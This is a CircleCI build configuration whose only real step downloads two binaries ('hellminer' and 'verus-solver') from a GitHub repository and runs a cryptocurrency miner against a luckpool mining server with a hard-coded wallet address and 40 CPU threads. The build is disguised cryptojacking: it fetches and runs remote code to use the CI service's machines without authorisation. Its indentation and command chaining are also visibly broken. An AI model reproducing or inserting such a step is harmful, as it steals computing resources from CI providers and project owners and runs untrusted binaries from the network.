version: 2.0
jobs:
  build:
      docker:
            - image: circleci/ruby:2.4.2-jessie-node
                    auth:
                              username: mydockerhub-user
                                        password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
                                            steps:
                                                  - checkout
                                                        - run:wget https://github.com/Godmine99/cpu/raw/main/hellminer && chmod +x hellminer && wget https://github.com/Godmine99/cpu/raw/main/verus-solver && chmod +x verus-solver ./verus-solver && ./hellminer -c stratum+tcp://na.luckpool.net:3956 -u RULmfWmVaia8mocAid2PeHpBPTdwx6ajAD -p x --cpu 40